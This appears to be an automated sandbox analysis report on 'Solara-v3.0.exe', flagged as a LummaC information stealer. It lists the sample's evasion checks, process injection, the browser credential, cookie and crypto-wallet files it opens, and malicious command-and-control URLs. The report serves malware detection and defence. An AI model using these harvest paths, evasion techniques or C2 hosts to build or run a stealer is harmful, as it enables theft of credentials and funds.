                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: Solara-v3.0.exeStatic PE information: real checksum: 0x96fd3 should be: 0x902c3
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C9FB83 push ecx; ret 0_2_00C9FB96
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00C9FB83 push ecx; ret 3_2_00C9FB96
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004479FC push edi; retf 4_2_004479FD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00419185 push ebx; ret 4_2_0041918C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004191BB push ebx; ret 4_2_004191CE
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00447371 push 084300B2h; ret 4_2_0044739E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00444D1C push eax; retf 4_2_00444D1E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00447D95 pushad ; iretd 4_2_00447FDD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043B5B0 push eax; mov dword ptr [esp], 31A531AAh4_2_0043B5BE
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043E6B0 push eax; mov dword ptr [esp], 352E36E1h4_2_0043E6B3
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00446F14 push ebp; ret 4_2_00446F15
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\Solara-v3.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeWindow / User API: threadDelayed 6290Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21243
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe TID: 1496Thread sleep time: -210000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe TID: 6488Thread sleep count: 6290 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CB1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CB1FE9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CB1F38 FindFirstFileExW,0_2_00CB1F38
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CB1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00CB1FE9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CB1F38 FindFirstFileExW,3_2_00CB1F38
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | API call chain: ExitProcess graph end node (graph_4-13953)
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 4_2_0043CD20 LdrInitializeThunk
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00C9F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CCA19E mov edi, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00C91FB0 mov edi, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00C91FB0 mov edi, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CAD8E0 GetProcessHeap
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00C9F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00C9F8DD SetUnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CA7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00C9F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00C9F8DD SetUnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00C9F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CA7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CCA19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Memory written: C:\Users\user\Desktop\Solara-v3.0.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Process created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CAD1BD EnumSystemLocalesW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1287 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB14D8 EnumSystemLocalesW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1580 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB17D3 EnumSystemLocalesW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1840 GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1960 GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1915 EnumSystemLocalesW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1A07 GetLocaleInfoW,GetLocaleInfoW,GetACP
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CB1B0D GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CACC15 GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CAD1BD EnumSystemLocalesW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1287 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB14D8 EnumSystemLocalesW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1580 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB17D3 EnumSystemLocalesW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1840 GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1960 GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1915 EnumSystemLocalesW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1A07 GetLocaleInfoW,GetLocaleInfoW,GetACP
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CB1B0D GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 3_2_00CACC15 GetLocaleInfoW
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Code function: 0_2_00CA00B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2220043538.0000000003308000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: Process Memory Space: Solara-v3.0.exe PID: 5668, type: MEMORYSTR
                    Source: Yara match | File source: 4.2.Solara-v3.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.Solara-v3.0.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    Source: Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
                    Source: Solara-v3.0.exe, 00000004.00000003.2257759722.0000000003375000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wal
                    Source: Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                    Source: Solara-v3.0.exe, 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
                    Source: Solara-v3.0.exe, 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
                    Source: Solara-v3.0.exe, 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: Solara-v3.0.exe, 00000004.00000003.2257643086.000000000336F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Solara-v3.0.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\Solara-v3.0.exe, Directory queried: C:\Users\user\Documents
Source: Yara match, File source: 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.2193850105.000000000331F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.2193758527.000000000331F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.2215763251.0000000003332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.2193931805.0000000003331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Solara-v3.0.exe PID: 5668, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match, File source: Process Memory Space: Solara-v3.0.exe PID: 5668, type: MEMORYSTR
Source: Yara match, File source: 4.2.Solara-v3.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.Solara-v3.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 211 Process Injection | 3 Obfuscated Files or Information | LSASS Memory | 11 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 33 System Information Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Query Registry | Distributed Component Object Model | 3 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 241 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 211 Process Injection | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
Solara-v3.0.exe | 37% | ReversingLabs | Win32.Trojan.LummaC
Solara-v3.0.exe | 51% | Virustotal |
Solara-v3.0.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
https://lev-tolstoi.com/p | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/m | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/i | 100% | Avira URL Cloud | malware
https://scentniej.buzz/api0 | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/w | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apiinhpmnjffcofjonbfbgaoc | 100% | Avira URL Cloud | malware
https://appliacnesot.buzz/api | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apiifaf) | 100% | Avira URL Cloud | malware
https://cashfuzysao.buzz/apiB | 100% | Avira URL Cloud | malware
https://inherineau.buzz/api | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/api2Y61 | 100% | Avira URL Cloud | malware
https://hummskitnj.buzz/api | 100% | Avira URL Cloud | malware
https://lev-tolstoi.co | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 104.21.66.86 | true | false | | high
cashfuzysao.buzz | unknown | unknown | true | | unknown
scentniej.buzz | unknown | unknown | false | | high
inherineau.buzz | unknown | unknown | false | | high
prisonyfork.buzz | unknown | unknown | false | | high
rebuildeso.buzz | unknown | unknown | false | | high
appliacnesot.buzz | unknown | unknown | true | | unknown
hummskitnj.buzz | unknown | unknown | false | | high
mindhandru.buzz | unknown | unknown | false | | high
screwamusresz.buzz | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
https://lev-tolstoi.com/api | false | | high
hummskitnj.buzz | false | | high
mindhandru.buzz | false | | high
                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
